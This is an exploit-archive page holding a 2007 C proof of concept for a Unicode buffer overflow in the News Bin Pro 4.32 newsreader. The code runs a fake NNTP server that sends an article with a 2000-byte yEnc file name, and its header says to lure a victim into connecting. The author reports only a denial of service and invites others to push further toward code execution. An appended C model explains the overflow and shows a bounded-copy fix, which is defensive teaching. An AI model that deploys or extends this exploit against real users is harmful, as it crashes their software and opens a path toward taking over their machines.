News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit
Source: Marsupilamipowa@hotmail.fr  Author: Marsu  Published: 2007-03-13
/********************************************************************************
*      News Bin Pro 4.32 Article Grabbing Remote Unicode Buffer Overflow        *
*                                                                               *
*                                                                               *
* There is a remote buffer overflow in News Bin Pro 4.32 that can be triggered  *
* by grabbing articles that contain an overly long file name.                   *
*                                                                               *
* To exploit, convince someone to set their newsgroup server to your IP:119 and *
* ask them to download an article and to bypass filters.                        *
*                                                                               *
* This is just a DoS. I couldn't make EIP point to some interesting place. This *
* is a Unicode buffer overflow and we can force EIP to point to 0x00410041, but *
* there's no good call esp in those places. However, if we can set EIP to       *
* 0x41004100 the problem is solved. Tell me if you go further.                  *
* Have Fun!                                                                     *
*                                                                               *
* Tested against WIN XP SP2 FR                                                  *
* Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    char recvbuff[1024];
    char evilbuff[10000];
    char* postname;
    size_t postlen, off;
    sockaddr_in sin;
    SOCKET server, client;
    WSADATA wsaData;

    // NNTP responses the fake server plays back. The 2000 bytes of padding
    // between header2 and header3 become the yEnc file name that overflows.
    const char header[] = "220 0 ";
    const char header2[] = " article\r\n"
        "Path: news.giganews.com.POSTED!not-for-mail\r\n"
        "NNTP-Posting-Date: Thu, 01 Mar 2007 11:25:26 -0600\r\n"
        "Lines: 5\r\n"
        "X-Postfilter: 1.3.34\r\n"
        "Xref:news.giganews.com alt.binaries.blabla:123456789\r\n\r\n\r\n"
        "=ybegin part=1 line=128 size=127 name="; // the overly long file name follows
    const char header3[] = "\r\n"
        "=ypart begin=1 end=127\r\n"
        "blablabla\r\n"
        "=yend size=127 part=1 pcrc32=d4f19f0f\r\n"
        ".\r\n";

    WSAStartup(MAKEWORD(1,1), &wsaData);

    server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons(119);
    if (bind(server, (SOCKADDR*)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        printf("[-] Error in bind! Is something else listening on 119?\n");
        exit(-1);
    }
    printf("[+] News Bin Pro 4.32 ARTICLE cmd Remote Unicode Buffer Overflow\n");
    printf("[+] Coded and Discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
    printf("[*] Listening on port 119...\n");
    listen(server, 5);
    printf("[*] Waiting for client...\n");
    printf("[+] Once connected, ask him to download a post and bypass the filter\n");

    client = accept(server, NULL, NULL);
    if (client == INVALID_SOCKET)
    {
        printf("[-] Error in accept!\n");
        exit(-1);
    }
    printf("[+] Client connected\n");

    // NNTP greeting
    if (send(client, "200 Hello there\r\n", 17, 0) == -1)
    {
        printf("[-] Error in send!\n");
        exit(-1);
    }

    // MODE READER, or AUTHINFO USER if the client has credentials configured.
    // recv() one byte short of the buffer so recvbuff always stays NUL-terminated.
    memset(recvbuff, 0, sizeof(recvbuff));
    recv(client, recvbuff, sizeof(recvbuff) - 1, 0);
    printf("-> %s\n", recvbuff);
    if (strstr(recvbuff, "AUTHINFO")) {
        send(client, "381 Pass please?\r\n", 18, 0);

        // AUTHINFO PASS
        memset(recvbuff, 0, sizeof(recvbuff));
        recv(client, recvbuff, sizeof(recvbuff) - 1, 0);
        printf("-> %s\n", recvbuff);
        send(client, "281 Pleased to meet you\r\n", 25, 0);

        // MODE READER
        memset(recvbuff, 0, sizeof(recvbuff));
        recv(client, recvbuff, sizeof(recvbuff) - 1, 0);
        printf("-> %s\n", recvbuff);
    }
    send(client, "200 \r\n", 6, 0);

    // GROUP: answer with a made-up article range for the group
    memset(recvbuff, 0, sizeof(recvbuff));
    recv(client, recvbuff, sizeof(recvbuff) - 1, 0);
    printf("-> %s\n", recvbuff);
    {
        const char groupresp[] = "211 935430 87608194 88543623 alt.binaries.blabla\r\n";
        send(client, groupresp, strlen(groupresp), 0);
    }

    // ARTICLE <message-id>: keep the id so it can be echoed back in the 220 line
    memset(recvbuff, 0, sizeof(recvbuff));
    recv(client, recvbuff, sizeof(recvbuff) - 1, 0);
    printf("-> %s\n", recvbuff);

    postlen = strlen(recvbuff);
    postname = (char *)malloc(postlen + 1);
    if (postname == NULL)
    {
        printf("[-] malloc failed!\n");
        exit(-1);
    }
    memset(postname, 0, postlen + 1);
    if (strncmp(recvbuff, "ARTICLE ", 8) != 0) {
        printf("[-] ARTICLE was expected. Exploit will fail.\n");
    }
    else {
        memcpy(postname, recvbuff + 8, postlen - 8);
        postname[strcspn(postname, "\r\n")] = '\0'; // drop the CRLF so the id doesn't split the 220 line
        printf("[+] Using %s to build evil data.\n", postname);
    }

    // Assemble: "220 0 <id> article\r\n" + headers + "=ybegin ... name=" + 2000 x 'A' + trailer
    memset(evilbuff, 'A', sizeof(evilbuff));
    off = 0;
    memcpy(evilbuff + off, header, strlen(header));       off += strlen(header);
    memcpy(evilbuff + off, postname, strlen(postname));   off += strlen(postname);
    memcpy(evilbuff + off, header2, strlen(header2));     off += strlen(header2);
    off += 2000;                                          // the 'A's already in place are the file name
    memcpy(evilbuff + off, header3, strlen(header3) + 1); // +1 copies the NUL, terminating evilbuff
    send(client, evilbuff, strlen(evilbuff), 0);

    printf("[+] Evil data sent. EIP should have become 0x00410041 \n    Tell me if you can go further =)\n");
    Sleep(500);
    free(postname);
    closesocket(client);
    closesocket(server);
    WSACleanup();
    return 0;
}
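The overflow the header describes, modelled in portable C as an added illustration. This is not Marsu's exploit and not News Bin Pro's own parser (News Bin Pro is closed source and nothing of it appears on this page): the 64-byte field size, the function names and the canary-filled arena are assumptions chosen so the bug class can be shown without crashing. It parses the `=ybegin ... name=` line the exploit sends, measures how far the unbounded copy runs past the field, shows the bounded copy that truncates instead, and reproduces the UTF-16 widening that turns a run of `A` into the 0x00410041 the exploit reports in EIP.

```c
/* Added illustration of the bug class described above; not Marsu's exploit and
 * not News Bin Pro's code. NAME_FIELD_SIZE, the function names and the canary
 * arena are assumptions chosen to show the overflow without crashing. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_FIELD_SIZE 64      /* assumed size of the fixed-size name field */

/* Find the value of "name=" on a yEnc =ybegin line. yEnc puts name last, so
 * the value runs to the end of the line. Returns NULL if not an =ybegin line. */
static const char *ybegin_name(const char *line, size_t *len_out)
{
    const char *p;
    if (strncmp(line, "=ybegin ", 8) != 0) return NULL;
    p = strstr(line, " name=");
    if (p == NULL) return NULL;
    p += 6;
    *len_out = strcspn(p, "\r\n");
    return p;
}

/* Vulnerable model: trusts the sender's length and copies it into a field that
 * is only NAME_FIELD_SIZE bytes. Returns bytes written (value + NUL), 0 if none. */
static size_t copy_name_vulnerable(const char *line, char *field)
{
    size_t n;
    const char *v = ybegin_name(line, &n);
    if (v == NULL) return 0;
    memcpy(field, v, n);        /* no comparison against NAME_FIELD_SIZE */
    field[n] = '\0';
    return n + 1;
}

/* Hardened version: bounds the copy, NUL-terminates, reports truncation. */
static size_t copy_name_safe(const char *line, char *field, size_t field_size,
                             int *truncated)
{
    size_t n;
    const char *v = ybegin_name(line, &n);
    *truncated = 0;
    if (v == NULL || field_size == 0) return 0;
    if (n >= field_size) {
        n = field_size - 1;
        *truncated = 1;
    }
    memcpy(field, v, n);
    field[n] = '\0';
    return n;
}

/* Widen the first two ASCII bytes to UTF-16LE, as the Unicode conversion the
 * exploit header refers to does, and return them as a little-endian DWORD:
 * "AA" becomes 41 00 41 00, i.e. the 0x00410041 that lands in EIP. */
static uint32_t widened_dword(const char *s)
{
    uint8_t w[4] = {0, 0, 0, 0};
    size_t i;
    for (i = 0; i < 2 && s[i] != '\0'; i++)
        w[2 * i] = (uint8_t)s[i];   /* high byte of each UTF-16 unit stays 0 */
    return (uint32_t)w[0] | ((uint32_t)w[1] << 8) |
           ((uint32_t)w[2] << 16) | ((uint32_t)w[3] << 24);
}

/* Constructed input: the =ybegin line the exploit sends, with name_len 'A's. */
static char *build_ybegin_line(size_t name_len)
{
    const char *prefix = "=ybegin part=1 line=128 size=127 name=";
    size_t plen = strlen(prefix);
    char *line = malloc(plen + name_len + 3);
    if (line == NULL) return NULL;
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', name_len);
    memcpy(line + plen + name_len, "\r\n", 3);    /* includes the NUL */
    return line;
}

/* Run the vulnerable copy with the field at the start of a 0xCC-filled arena
 * large enough to absorb the overrun, and count arena bytes clobbered beyond
 * the field. On a real stack those bytes are saved registers and the return
 * address, which is how 'A's reach EIP. */
static size_t measure_overrun(size_t name_len)
{
    size_t arena = NAME_FIELD_SIZE + name_len + 1;
    unsigned char *buf = malloc(arena);
    char *line = build_ybegin_line(name_len);
    size_t clobbered = 0, i;
    if (buf == NULL || line == NULL) { free(buf); free(line); return 0; }
    memset(buf, 0xCC, arena);
    copy_name_vulnerable(line, (char *)buf);
    for (i = NAME_FIELD_SIZE; i < arena; i++)
        if (buf[i] != 0xCC) clobbered++;
    free(line);
    free(buf);
    return clobbered;
}

int main(void)
{
    char field[NAME_FIELD_SIZE];
    int truncated;
    char *line = build_ybegin_line(2000);   /* same 2000-byte name as the exploit */
    if (line == NULL) return 1;
    printf("vulnerable copy: %zu bytes clobbered past the %d-byte field\n",
           measure_overrun(2000), NAME_FIELD_SIZE);
    printf("safe copy kept %zu bytes, truncated=%d\n",
           copy_name_safe(line, field, sizeof field, &truncated), truncated);
    printf("\"AA\" widened to UTF-16LE reads as 0x%08x in EIP\n",
           (unsigned)widened_dword("AAAA"));
    free(line);
    return 0;
}
```

With the exploit's 2000-byte name, the unbounded copy writes 1937 bytes past the assumed 64-byte field; the bounded copy keeps 63 bytes and flags the truncation, which is the check a reader should apply before the name reaches any fixed-size field or Unicode conversion.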

